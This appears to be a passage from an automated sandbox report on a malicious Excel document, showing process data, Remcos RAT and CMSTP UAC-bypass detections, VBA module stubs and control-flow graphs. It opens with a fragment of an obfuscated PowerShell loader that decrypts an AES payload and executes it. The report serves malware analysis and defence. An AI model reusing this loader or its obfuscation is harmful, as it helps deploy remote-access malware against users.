0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
                Imagebase:0xab0000
                File size:427'008 bytes
                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:true

                Target ID:11
                Start time:02:24:51
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Imagebase:0x110000
                File size:64'704 bytes
                MD5 hash:8FE9545E9F72E460723F484C304314AD
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Call Graph

                • Entrypoint
                • Decryption Function
                • Executed
                • Not Executed
                • Show Help
                callgraph 1 Error: Graph is empty

                Module: Sheet1

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet1"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: Sheet2

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet2"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: Sheet3

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet3"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: ThisWorkbook

                Declaration
                LineContent
                1

                Attribute VB_Name = "ThisWorkbook"

                2

                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Reset < >

                  Execution Graph

                  Execution Coverage:5.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:22.2%
                  Total number of Nodes:18
                  Total number of Limit Nodes:3
                  execution_graph 11955 227d08 11956 227d2f 11955->11956 11961 22a0e0 11956->11961 11965 22966c 11956->11965 11969 229ca9 11956->11969 11957 227e3a 11963 229783 11961->11963 11962 22a169 11962->11957 11963->11962 11973 2291e0 11963->11973 11966 2296ab 11965->11966 11967 22a169 11966->11967 11968 2291e0 CreateProcessA 11966->11968 11967->11957 11968->11966 11971 229783 11969->11971 11970 22a169 11970->11957 11971->11969 11971->11970 11972 2291e0 CreateProcessA 11971->11972 11972->11971 11974 229267 11973->11974 11974->11974 11975 229452 CreateProcessA 11974->11975 11976 2294c5 11975->11976

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 421 22966c-2296a9 422 2296b0-229782 421->422 423 2296ab 421->423 424 229783-229866 call 2291e0 422->424 423->422 430 229868-229884 424->430 431 22988f-2298b8 424->431 430->431 434 2298ba 431->434 435 2298bf-229904 431->435 434->435 439 229906 435->439 440 22990b-229937 435->440 439->440 442 2299a1-2299db 440->442 443 229939-229974 440->443 446 229a04-229a0e 442->446 447 2299dd-2299f9 442->447 448 229976-229992 443->448 449 22999d-22999f 443->449 450 229a10 446->450 451 229a15-229a2d 446->451 447->446 448->449 449->446 450->451 454 229a34-229a70 451->454 455 229a2f 451->455 459 229a72-229a8e 454->459 460 229a99-229a9f 454->460 455->454 459->460 461 229ad1-229ad3 460->461 462 229aa1-229acf 460->462 464 229ad9-229aed 461->464 462->464 466 229b16-229b20 464->466 467 229aef-229b0b 464->467 468 229b22 466->468 469 229b27-229b4b 466->469 467->466 468->469 474 229b52-229bb5 469->474 475 229b4d 469->475 478 229bb7-229bd3 474->478 479 229bde-229c1f 474->479 475->474 478->479 482 229c21-229c3d 479->482 483 229c48-229c52 479->483 482->483 484 229c54 483->484 485 229c59-229c66 483->485 484->485 487 229c68 485->487 488 229c6d-229c8b 485->488 487->488 492 229c92-229c9e 488->492 493 229c8d 488->493 494 229e5e-229e7a 492->494 493->492 495 229ca3-229cae 494->495 496 229e80-229ea4 494->496 498 229cb0 495->498 499 229cb5-229cdc 495->499 501 229ea6 496->501 502 229eab-229ee9 496->502 498->499 505 229ce3-229d0a 499->505 506 229cde 499->506 501->502 507 229f12-229f1c 502->507 508 229eeb-229f07 502->508 513 229d11-229d48 505->513 514 229d0c 505->514 506->505 510 229f23-229f50 507->510 511 229f1e 507->511 508->507 516 229f52-229f59 510->516 517 229f5a-229f63 510->517 511->510 522 229d4e-229d5c 513->522 523 229e2f-229e39 513->523 514->513 516->517 520 229f65 517->520 521 229f6a-229f7a 517->521 520->521 524 229f81-229fb2 521->524 525 229f7c 521->525 528 229d63-229d6a 522->528 529 229d5e 522->529 526 229e40-229e51 523->526 527 229e3b 523->527 536 229fb4-229fef 524->536 537 22a01c-22a056 524->537 525->524 532 229e53 526->532 533 229e58 526->533 527->526 530 229d71-229db9 528->530 531 229d6c 528->531 529->528 543 229dc0-229e05 530->543 544 229dbb 530->544 531->530 532->533 533->494 545 229ff1-22a00d 536->545 546 22a018-22a01a 536->546 541 22a058-22a074 537->541 542 22a07f-22a0b3 537->542 541->542 551 22a0b5-22a0d1 542->551 552 22a0dc-22a144 542->552 553 229e07-229e23 543->553 554 229e2e 543->554 544->543 545->546 546->542 551->552 560 22a146 552->560 561 22a14b-22a163 552->561 553->554 554->523 560->561 561->424 562 22a169-22a171 561->562
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.446518613.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_220000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8!
                  • API String ID: 0-1673500142
                  • Opcode ID: b11c138d87dbc801c82731748a57a8d84871ce4adee3d531aa4da06f360e81b6
                  • Instruction ID: 659fbb12edeb07c48210c24c2eef860b724edf47c0aae2633fc21699331c7ba9
                  • Opcode Fuzzy Hash: b11c138d87dbc801c82731748a57a8d84871ce4adee3d531aa4da06f360e81b6
                  • Instruction Fuzzy Hash: A332F274E002289FDB64DFA5C884BEDBBB2BF89300F5481EA9409AB255DB745EC5CF50

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 585 2256f6 586 2256f8-225703 585->586 587 22568c-225692 585->587 590 225712-225734 586->590 591 225705-225708 586->591 588 225914-225961 587->588 589 225698-2256a5 587->589 597 225963-225979 588->597 598 2259d9-2259eb 588->598 592 2256a7-2256bb 589->592 593 2256ef-2256f3 589->593 599 2257f2-22582e 590->599 600 22573a-225743 590->600 591->590 593->585 601 22597b 597->601 602 22597e-225990 597->602 607 2259ee-2259f0 598->607 608 225a4c 598->608 636 225831-22584b 599->636 600->588 603 225749-22577b 600->603 601->602 602->598 614 225992-22599c 602->614 622 225795-2257a8 603->622 623 22577d-225793 603->623 611 2259f1-2259fb 607->611 612 225a4e-225a59 608->612 613 225aac-225ab9 608->613 617 2259fe-225a4b 611->617 618 225a5c 611->618 612->611 616 225a5b 612->616 625 225abc-225adc 613->625 619 2259aa-2259d8 614->619 620 22599e-2259a0 614->620 624 225a5e-225a79 616->624 616->625 617->612 617->613 618->624 618->625 620->619 628 2257aa-2257b1 622->628 623->628 640 225ade-225aeb 625->640 641 225b3c 625->641 632 2257b3-2257c4 628->632 633 2257d6 628->633 632->633 642 2257c6-2257cf 632->642 633->599 648 225855-22585b 636->648 644 225b4c-225b59 640->644 645 225aec 640->645 646 225b3e-225b49 641->646 647 225b9c 641->647 642->633 652 225af0-225afb 644->652 660 225b5b 644->660 645->644 651 225aee 645->651 646->644 649 225b9e-225ba6 647->649 650 225bfc 647->650 656 225862-22588c 648->656 649->650 653 225bfe-225c26 650->653 654 225c5c-225c79 650->654 651->652 661 225afe-225b39 652->661 662 225b5c 652->662 667 225c2d-225c59 653->667 676 2258a6-2258b9 656->676 677 22588e-2258a4 656->677 663 225b5e 660->663 664 225bbc-225bc9 660->664 661->641 662->663 662->664 668 225b60-225b79 663->668 664->668 669 225bcb 664->669 675 225bef-225bfb 667->675 678 225c5b 667->678 671 225bce-225be9 669->671 672 225c2c 669->672 671->675 672->667 675->653 675->654 679 2258bb-2258c2 676->679 677->679 678->654 680 2258d1-2258db 679->680 681 2258c4-2258ca 679->681 680->636 681->680
                  Memory Dump Source
                  • Source File: 00000009.00000002.446518613.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_220000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2af8f77813511f207c4aeb158f55831c78a51caadb6182df0bec1ee473bcaeba
                  • Instruction ID: 2a3ce62e4725b07a2078a059ecec01d608c5a686a05198999b5221524fe02269
                  • Opcode Fuzzy Hash: 2af8f77813511f207c4aeb158f55831c78a51caadb6182df0bec1ee473bcaeba
                  • Instruction Fuzzy Hash: 86A202719197A5AFCB02CBA8D8A4AD9BFB1FF16314B0A84C7D480DB2A3C6349C56C751

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 2291e0-229279 2 2292c2-2292ea 0->2 3 22927b-229292 0->3 7 229330-229386 2->7 8 2292ec-229300 2->8 3->2 6 229294-229299 3->6 9 22929b-2292a5 6->9 10 2292bc-2292bf 6->10 17 229388-22939c 7->17 18 2293cc-2294c3 CreateProcessA 7->18 8->7 15 229302-229307 8->15 12 2292a7 9->12 13 2292a9-2292b8 9->13 10->2 12->13 13->13 16 2292ba 13->16 19 22932a-22932d 15->19 20 229309-229313 15->20 16->10 17->18 26 22939e-2293a3 17->26 36 2294c5-2294cb 18->36 37 2294cc-2295b1 18->37 19->7 21 229317-229326 20->21 22 229315 20->22 21->21 25 229328 21->25 22->21 25->19 28 2293c6-2293c9 26->28 29 2293a5-2293af 26->29 28->18 30 2293b3-2293c2 29->30 31 2293b1 29->31 30->30 32 2293c4 30->32 31->30 32->28 36->37 49 2295b3-2295b7 37->49 50 2295c1-2295c5 37->50 49->50 51 2295b9 49->51 52 2295c7-2295cb 50->52 53 2295d5-2295d9 50->53 51->50 52->53 54 2295cd 52->54 55 2295db-2295df 53->55 56 2295e9-2295ed 53->56 54->53 55->56 59 2295e1 55->59 57 229623-22962e 56->57 58 2295ef-229618 56->58 63 22962f 57->63 58->57 59->56 63->63
                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002294A7
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.446518613.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_220000_powershell.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID: 8!$8!$8!
                  • API String ID: 963392458-1940048706
                  • Opcode ID: f9bb8638fa84a719a475c440c2d33b3646dd6fb420f53bf3a86b78be334a80da
                  • Instruction ID: 8ac2aecfa089414770436fd301623e81d89972ce0137370d10cfeb3674c3be0f
                  • Opcode Fuzzy Hash: f9bb8638fa84a719a475c440c2d33b3646dd6fb420f53bf3a86b78be334a80da
                  • Instruction Fuzzy Hash: 2EC13870D102299FDF10DFA4D841BEDBBB1BF49300F0091A9D859B7290DB749A95CF91

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 64 3d1420-3d1445 65 3d144b-3d1450 64->65 66 3d1603-3d1637 64->66 67 3d1468-3d146c 65->67 68 3d1452-3d1458 65->68 76 3d1639-3d1645 66->76 77 3d1647 66->77 72 3d15b3-3d15bd 67->72 73 3d1472-3d1474 67->73 70 3d145c-3d1466 68->70 71 3d145a 68->71 70->67 71->67 78 3d15bf-3d15c8 72->78 79 3d15cb-3d15d1 72->79 74 3d1484 73->74 75 3d1476-3d1482 73->75 80 3d1486-3d1488 74->80 75->80 81 3d1649-3d164b 76->81 77->81 82 3d15d7-3d15e3 79->82 83 3d15d3-3d15d5 79->83 80->72 85 3d148e-3d1495 80->85 86 3d16f4-3d16fe 81->86 87 3d1651-3d1669 81->87 88 3d15e5-3d1600 82->88 83->88 85->66 91 3d149b-3d14a0 85->91 89 3d1709-3d170f 86->89 90 3d1700-3d1706 86->90 102 3d166f-3d1674 87->102 103 3d1744-3d174d 87->103 93 3d1715-3d1721 89->93 94 3d1711-3d1713 89->94 95 3d14b8-3d14c6 91->95 96 3d14a2-3d14a8 91->96 99 3d1723-3d1741 93->99 94->99 95->72 111 3d14cc-3d14e9 95->111 100 3d14ac-3d14b6 96->100 101 3d14aa 96->101 100->95 101->95 107 3d168c-3d1696 102->107 108 3d1676-3d167c 102->108 115 3d174f-3d178c 103->115 116 3d17a0 103->116 117 3d169b-3d16ac 107->117 112 3d167e 108->112 113 3d1680-3d168a 108->113 111->72 139 3d14ef-3d1514 111->139 112->107 113->107 119 3d179c 115->119 120 3d178e-3d179a 115->120 121 3d185f-3d1869 116->121 122 3d17a6-3d17a8 116->122 117->103 132 3d16b2-3d16b7 117->132 125 3d179e 119->125 120->125 127 3d186b-3d1874 121->127 128 3d1877-3d187d 121->128 129 3d17aa-3d17b0 122->129 130 3d17c2-3d17cb 122->130 125->116 133 3d187f-3d1881 128->133 134 3d1883-3d188f 128->134 135 3d17b4-3d17c0 129->135 136 3d17b2 129->136 137 3d17cd 130->137 138 3d17cf-3d17de 130->138 140 3d16cf-3d16f1 132->140 141 3d16b9-3d16bf 132->141 142 3d1891-3d18ad 133->142 134->142 135->130 136->130 137->138 148 3d17ed-3d1833 138->148 149 3d17e0-3d17eb 138->149 139->72 159 3d151a-3d151c 139->159 143 3d16c1 141->143 144 3d16c3-3d16cd 141->144 143->140 144->140 175 3d183f-3d1849 148->175 176 3d1835 148->176 153 3d1853-3d185c 149->153 161 3d151e-3d1524 159->161 162 3d1536-3d1541 159->162 163 3d1528-3d1534 161->163 164 3d1526 161->164 167 3d1559-3d15b0 162->167 168 3d1543-3d1549 162->168 163->162 164->162 170 3d154d-3d154f 168->170 171 3d154b 168->171 170->167 171->167 177 3d184b 175->177 178 3d183a 175->178 176->178 177->153 178->175
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4:)$4:)$9)$9)
                  • API String ID: 0-3147790239
                  • Opcode ID: 56432b52db7cb9e868e84f229130486d7a2a5b5e327c8f297035269eb6bd9636
                  • Instruction ID: bf1acbb130ebda8b0f7fa3d3440769f1f71448d069b7093191249985b2782f92
                  • Opcode Fuzzy Hash: 56432b52db7cb9e868e84f229130486d7a2a5b5e327c8f297035269eb6bd9636
                  • Instruction Fuzzy Hash: 29C10532B04205AFDB169B69E840A6AFBF6AFC5310B29C1BBD849CB351DB31DD41C791

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 179 3d52b4-3d52b7 180 3d52bd-3d52c5 179->180 181 3d52b9-3d52bb 179->181 182 3d52dd-3d52e1 180->182 183 3d52c7-3d52cc 180->183 181->180 186 3d540c-3d5416 182->186 187 3d52e7-3d52eb 182->187 184 3d52cd 183->184 185 3d52d1-3d52db 183->185 184->185 188 3d52cf 184->188 185->182 189 3d5418-3d5421 186->189 190 3d5424-3d542a 186->190 191 3d52ed-3d52fe 187->191 192 3d532b 187->192 188->182 195 3d542c-3d542e 190->195 196 3d5430-3d543c 190->196 202 3d5464-3d546d 191->202 203 3d5304-3d5309 191->203 193 3d532d-3d532f 192->193 193->186 197 3d5335-3d5339 193->197 199 3d543e-3d5461 195->199 196->199 197->186 201 3d533f-3d5343 197->201 201->186 207 3d5349-3d536f 201->207 212 3d546f-3d54b3 202->212 213 3d54c0-3d54c6 202->213 204 3d530b-3d5311 203->204 205 3d5321-3d5329 203->205 208 3d5315-3d531f 204->208 209 3d5313 204->209 205->193 207->186 226 3d5375-3d5379 207->226 208->205 209->205 216 3d54b9-3d54be 212->216 217 3d56b6-3d56c3 212->217 218 3d54c8 213->218 219 3d54ca-3d54d4 213->219 216->213 220 3d54d6-3d54da 216->220 218->220 219->220 224 3d565f-3d5669 220->224 225 3d54e0-3d54e2 220->225 231 3d566b-3d5672 224->231 232 3d5675-3d567b 224->232 229 3d54e4-3d54f0 225->229 230 3d54f2 225->230 227 3d539c 226->227 228 3d537b-3d5384 226->228 236 3d539f-3d53ac 227->236 233 3d538b-3d5398 228->233 234 3d5386-3d5389 228->234 235 3d54f4-3d54f6 229->235 230->235 237 3d567d-3d567f 232->237 238 3d5681-3d568d 232->238 239 3d539a 233->239 234->239 235->224 240 3d54fc-3d551b 235->240 243 3d53b2-3d5409 236->243 241 3d568f-3d56b3 237->241 238->241 239->236 250 3d551d-3d5529 240->250 251 3d552b 240->251 252 3d552d-3d552f 250->252 251->252 252->224 253 3d5535-3d5539 252->253 253->224 254 3d553f-3d5543 253->254 255 3d5545-3d5554 254->255 256 3d5556 254->256 257 3d5558-3d555a 255->257 256->257 257->224 258 3d5560-3d5564 257->258 258->224 259 3d556a-3d5589 258->259 262 3d558b-3d5591 259->262 263 3d55a1-3d55ac 259->263 264 3d5595-3d5597 262->264 265 3d5593 262->265 266 3d55ae-3d55b1 263->266 267 3d55bb-3d55d7 263->267 264->263 265->263 266->267 268 3d55d9-3d55ec 267->268 269 3d55f4-3d55fe 267->269 268->269 270 3d5600 269->270 271 3d5602-3d5650 269->271 272 3d5655-3d565c 270->272 271->272
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: L4#p$L4#p$L4#p
                  • API String ID: 0-1310181111
                  • Opcode ID: e3dbf11aa41389a1fccf8a2ebf96bf9340cb0c046d3449586ed567e872f32f53
                  • Instruction ID: 4b04a3fa85b61145ba4d54d0b08236dcdb5697fcba2bf28e9f5068922926f2a0
                  • Opcode Fuzzy Hash: e3dbf11aa41389a1fccf8a2ebf96bf9340cb0c046d3449586ed567e872f32f53
                  • Instruction Fuzzy Hash: 02B14836700648DFDF169F24E840BAEBBA2AF85311F25846BE5128B391DB70DD91CB52

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 967 3d3a08-3d3a2b 968 3d3be9-3d3c35 967->968 969 3d3a31-3d3a36 967->969 977 3d3c3b-3d3c40 968->977 978 3d3dc1-3d3e0b 968->978 970 3d3a4e-3d3a52 969->970 971 3d3a38-3d3a3e 969->971 974 3d3a58-3d3a5a 970->974 975 3d3b90-3d3b9a 970->975 972 3d3a40 971->972 973 3d3a42-3d3a4c 971->973 972->970 973->970 981 3d3a5c-3d3a68 974->981 982 3d3a6a 974->982 979 3d3b9c-3d3ba5 975->979 980 3d3ba8-3d3bae 975->980 984 3d3c58-3d3c5c 977->984 985 3d3c42-3d3c48 977->985 996 3d3e11-3d3e16 978->996 997 3d3f62-3d3f69 978->997 986 3d3bb4-3d3bc0 980->986 987 3d3bb0-3d3bb2 980->987 983 3d3a6c-3d3a6e 981->983 982->983 983->975 989 3d3a74-3d3a78 983->989 993 3d3d71-3d3d7b 984->993 994 3d3c62-3d3c64 984->994 990 3d3c4c-3d3c56 985->990 991 3d3c4a 985->991 992 3d3bc2-3d3be6 986->992 987->992 998 3d3a98 989->998 999 3d3a7a-3d3a96 989->999 990->984 991->984 1000 3d3d7d-3d3d86 993->1000 1001 3d3d89-3d3d8f 993->1001 1003 3d3c74 994->1003 1004 3d3c66-3d3c72 994->1004 1005 3d3e2e-3d3e32 996->1005 1006 3d3e18-3d3e1e 996->1006 1028 3d3fbc-3d3fcc 997->1028 1029 3d3f6b-3d3fa6 997->1029 1010 3d3a9a-3d3a9c 998->1010 999->1010 1007 3d3d95-3d3da1 1001->1007 1008 3d3d91-3d3d93 1001->1008 1011 3d3c76-3d3c78 1003->1011 1004->1011 1017 3d3f0f-3d3f19 1005->1017 1018 3d3e38-3d3e3a 1005->1018 1013 3d3e20 1006->1013 1014 3d3e22-3d3e2c 1006->1014 1016 3d3da3-3d3dbe 1007->1016 1008->1016 1010->975 1019 3d3aa2-3d3aa6 1010->1019 1011->993 1020 3d3c7e-3d3c9d 1011->1020 1013->1005 1014->1005 1030 3d3f1b-3d3f24 1017->1030 1031 3d3f27-3d3f2d 1017->1031 1023 3d3e3c-3d3e48 1018->1023 1024 3d3e4a 1018->1024 1025 3d3ab9 1019->1025 1026 3d3aa8-3d3ab7 1019->1026 1054 3d3cad 1020->1054 1055 3d3c9f-3d3cab 1020->1055 1035 3d3e4c-3d3e4e 1023->1035 1024->1035 1039 3d3abb-3d3abd 1025->1039 1026->1039 1049 3d3fce 1028->1049 1050 3d3fd0-3d3fd2 1028->1050 1065 3d3fa8-3d3faa 1029->1065 1066 3d3fb4-3d3fb9 1029->1066 1032 3d3f2f-3d3f31 1031->1032 1033 3d3f33-3d3f3f 1031->1033 1040 3d3f41-3d3f5f 1032->1040 1033->1040 1035->1017 1042 3d3e54-3d3e58 1035->1042 1039->975 1043 3d3ac3-3d3ac5 1039->1043 1046 3d3e78 1042->1046 1047 3d3e5a-3d3e76 1042->1047 1052 3d3adf-3d3af9 1043->1052 1053 3d3ac7-3d3acd 1043->1053 1057 3d3e7a-3d3e7c 1046->1057 1047->1057 1059 3d3fdc-3d3fdd 1049->1059 1050->1059 1070 3d3b08-3d3b1e 1052->1070 1071 3d3afb-3d3afe 1052->1071 1060 3d3acf 1053->1060 1061 3d3ad1-3d3add 1053->1061 1064 3d3caf-3d3cb1 1054->1064 1055->1064 1057->1017 1067 3d3e82-3d3e85 1057->1067 1060->1052 1061->1052 1064->993 1069 3d3cb7-3d3cd6 1064->1069 1065->1066 1066->1028 1074 3d3e8f-3d3e95 1067->1074 1086 3d3cee-3d3d0d 1069->1086 1087 3d3cd8-3d3cde 1069->1087 1077 3d3b36-3d3b8d 1070->1077 1078 3d3b20-3d3b26 1070->1078 1071->1070 1079 3d3e9b-3d3e9d 1074->1079 1084 3d3b28 1078->1084 1085 3d3b2a-3d3b2c 1078->1085 1082 3d3e9f-3d3ea5 1079->1082 1083 3d3eb5-3d3f0c 1079->1083 1088 3d3ea9-3d3eab 1082->1088 1089 3d3ea7 1082->1089 1084->1077 1085->1077 1095 3d3d0f-3d3d12 1086->1095 1096 3d3d14-3d3d62 1086->1096 1091 3d3ce0 1087->1091 1092 3d3ce2-3d3ce4 1087->1092 1088->1083 1089->1083 1091->1086 1092->1086 1097 3d3d67-3d3d6e 1095->1097 1096->1097
                  Memory Dump Source
                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 08538c1341b9bf6ca49484d0db9838c6348e6aa5e5acb228d42178dcfb9559c4
                  • Instruction ID: dd5f51c12def3c4cb47f62cf8cd61df72474b77d78cfb419f27a35d3e4aaee9f
                  • Opcode Fuzzy Hash: 08538c1341b9bf6ca49484d0db9838c6348e6aa5e5acb228d42178dcfb9559c4
                  • Instruction Fuzzy Hash: 78E1E432B002059FDB169B74E8507AABBE6AFC5310F2580ABD455DB391DB71CE41C7A3

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1104 3d43e8-3d440b 1105 3d45e6-3d45ed 1104->1105 1106 3d4411-3d4416 1104->1106 1114 3d45ef-3d4612 1105->1114 1115 3d4640-3d4649 1105->1115 1107 3d442e-3d4432 1106->1107 1108 3d4418-3d441e 1106->1108 1112 3d4438-3d443c 1107->1112 1113 3d4593-3d459d 1107->1113 1110 3d4420 1108->1110 1111 3d4422-3d442c 1108->1111 1110->1107 1111->1107 1118 3d444f 1112->1118 1119 3d443e-3d444d 1112->1119 1116 3d459f-3d45a8 1113->1116 1117 3d45ab-3d45b1 1113->1117 1122 3d465f-3d4699 1114->1122 1123 3d4614-3d4619 1114->1123 1120 3d464b-3d464d 1115->1120 1121 3d4657-3d465c 1115->1121 1125 3d45b7-3d45c3 1117->1125 1126 3d45b3-3d45b5 1117->1126 1127 3d4451-3d4453 1118->1127 1119->1127 1120->1121 1138 3d46b8 1122->1138 1139 3d469b-3d46b6 1122->1139 1128 3d461b-3d4621 1123->1128 1129 3d4631-3d463c 1123->1129 1130 3d45c5-3d45e3 1125->1130 1126->1130 1127->1113 1131 3d4459-3d4479 1127->1131 1133 3d4625-3d462f 1128->1133 1134 3d4623 1128->1134 1129->1115 1147 3d4498 1131->1147 1148 3d447b-3d4496 1131->1148 1133->1129 1134->1129 1140 3d46ba-3d46bc 1138->1140 1139->1140 1145 3d474a-3d4754 1140->1145 1146 3d46c2-3d46c6 1140->1146 1150 3d4756-3d475d 1145->1150 1151 3d4760-3d4766 1145->1151 1146->1145 1149 3d46cc-3d46e9 1146->1149 1154 3d449a-3d449c 1147->1154 1148->1154 1160 3d46ef-3d46f1 1149->1160 1161 3d4799-3d479e 1149->1161 1152 3d476c-3d4778 1151->1152 1153 3d4768-3d476a 1151->1153 1157 3d477a-3d4796 1152->1157 1153->1157 1154->1113 1159 3d44a2-3d44a4 1154->1159 1163 3d44b4 1159->1163 1164 3d44a6-3d44b2 1159->1164 1165 3d470b-3d4720 1160->1165 1166 3d46f3-3d46f9 1160->1166 1161->1160 1169 3d44b6-3d44b8 1163->1169 1164->1169 1178 3d4726-3d4744 1165->1178 1179 3d47a3-3d47d4 1165->1179 1170 3d46fd-3d4709 1166->1170 1171 3d46fb 1166->1171 1169->1113 1173 3d44be-3d44de 1169->1173 1170->1165 1171->1165 1185 3d44f6-3d44fa 1173->1185 1186 3d44e0-3d44e6 1173->1186 1178->1145 1183 3d47e4 1179->1183 1184 3d47d6-3d47e2 1179->1184 1187 3d47e6-3d47e8 1183->1187 1184->1187 1190 3d44fc-3d4502 1185->1190 1191 3d4514-3d4518 1185->1191 1188 3d44e8 1186->1188 1189 3d44ea-3d44ec 1186->1189 1192 3d480a-3d4814 1187->1192 1193 3d47ea-3d47ee 1187->1193 1188->1185 1189->1185 1194 3d4504 1190->1194 1195 3d4506-3d4512 1190->1195 1196 3d451f-3d4521 1191->1196 1198 3d481e-3d4824 1192->1198 1199 3d4816-3d481b 1192->1199 1193->1192 1197 3d47f0-3d4807 1193->1197 1194->1191 1195->1191 1200 3d4539-3d4590 1196->1200 1201 3d4523-3d4529 1196->1201 1202 3d482a-3d4836 1198->1202 1203 3d4826-3d4828 1198->1203 1205 3d452d-3d452f 1201->1205 1206 3d452b 1201->1206 1209 3d4838-3d4852 1202->1209 1203->1209 1205->1200 1206->1200
                  Memory Dump Source
                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a88f0b62ff4d0c8849ac0f0ec60c7473a93079a2c25fd7c681ff4cd744396b79
                  • Instruction ID: 2d77ba6f880b9ed51d09b00f66c5ff29bd8ef6d34111a18ffc8530df067039af
                  • Opcode Fuzzy Hash: a88f0b62ff4d0c8849ac0f0ec60c7473a93079a2c25fd7c681ff4cd744396b79
                  • Instruction Fuzzy Hash: B8C135327043458FDB269B75A45077ABBE6AFC2310F2980ABD459CB392DB71CD81C762
                  Memory Dump Source
